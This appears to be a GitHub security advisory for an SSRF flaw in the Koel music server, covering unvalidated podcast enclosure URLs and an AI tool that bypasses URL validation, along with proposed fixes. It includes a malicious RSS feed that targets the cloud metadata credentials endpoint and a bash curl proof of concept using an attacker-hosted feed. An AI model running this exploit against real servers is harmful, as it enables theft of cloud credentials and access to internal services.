Koel validates the podcast feed URL via the SafeUrl rule (DNS resolution + public IP check), but the individual episode <enclosure url="..."> values extracted from the RSS XML are stored directly into the database without any SSRF validation. When a user plays an episode, the server downloads the full HTTP response from the unvalidated enclosure URL via Http::sink()->get() and streams it back to the user, enabling full-read SSRF against internal services.
File: app/Services/Podcast/PodcastService.php, line 146
'path' => $episodeValue->enclosure->url, // Unvalidated URL from RSS XML
The SafeUrl rule is applied to the podcast feed URL at subscription time (SubscribeToPodcastRequest), but episode enclosure URLs parsed from the feed XML are stored as-is.
File: app/Values/Podcast/EpisodePlayable.php, line 42
Http::sink($file)->get($episode->path)->throw();
When an episode is played, PodcastStreamerAdapter::stream() first attempts getStreamableUrl() (OPTIONS/HEAD requests to the episode URL). If no CORS header is present (which internal services won't have), it falls through to EpisodePlayable::createForEpisode(), which downloads the full response body and streams it back to the user.
File: app/Http/Requests/API/Podcast/SubscribeToPodcastRequest.php
public function rules(): array
{
return ['url' => ['required', 'url:http,https', new SafeUrl]];
}
The SafeUrl rule (app/Rules/SafeUrl.php) validates scheme, DNS resolution to public IP, and effective URL after redirects. But this only protects the feed URL — not the content within the feed.
<rss version="2.0">
<channel>
<title>Legit Podcast</title>
<item>
<title>Episode 1</title>
<enclosure url="http://169.254.169.254/latest/meta-data/iam/security-credentials/"
type="audio/mpeg" length="1000"/>
<guid>ssrf-1</guid>
</item>
</channel>
</rss>
POST /api/podcasts with url=https://evil.com/feed.xml — passes SafeUrl (public URL)path = http://169.254.169.254/...GET /play/{episode_id}Http::sink($file)->get("http://169.254.169.254/...")#!/bin/bash
# PoC: Koel SSRF via Podcast Episode Enclosure URL
# Step 1: Host malicious RSS feed (feed.xml) on attacker server
# Step 2: Subscribe to the podcast
KOEL_URL="https://TARGET"
API_TOKEN="<api_token>"
# Subscribe to malicious podcast
curl -X POST "$KOEL_URL/api/podcasts" \
-H "Authorization: Bearer $API_TOKEN" \
-H "Content-Type: application/json" \
-d '{"url": "https://attacker.com/feed.xml"}'
# List episodes to get the episode ID
EPISODE_ID=$(curl -s "$KOEL_URL/api/podcasts" \
-H "Authorization: Bearer $API_TOKEN" | jq -r '.[0].episodes[0].id')
# Play the episode — triggers SSRF, returns internal service response
curl "$KOEL_URL/play/$EPISODE_ID?api_token=$API_TOKEN" -o response.bin
cat response.bin
# Expected: AWS metadata / internal service response
File: app/Ai/Tools/AddRadioStation.php, lines 35-38
The AI assistant's AddRadioStation tool creates radio stations by calling RadioService::createRadioStation() directly, bypassing the SafeUrl and HasAudioContentType validation rules that protect the REST API endpoint.
Impact: Same SSRF but requires Plus license. CVSS 7.7 HIGH.
Fix 1: Validate episode enclosure URLs in synchronizeEpisodes():
foreach ($episodeCollection as $episodeValue) {
$enclosureUrl = $episodeValue->enclosure->url;
$host = parse_url($enclosureUrl, PHP_URL_HOST);
if (!$host || !Network::isPublicHost($host)) {
continue; // Skip episodes with non-public URLs
}
// ... rest of episode creation
}
Fix 2: Defense-in-depth validation at playback time in EpisodePlayable::createForEpisode().
Fix 3: Add SafeUrl validation in AddRadioStation AI tool.
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"github_reviewed_at": "2026-05-29T19:56:06Z",
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"severity": "HIGH",
"nvd_published_at": null
}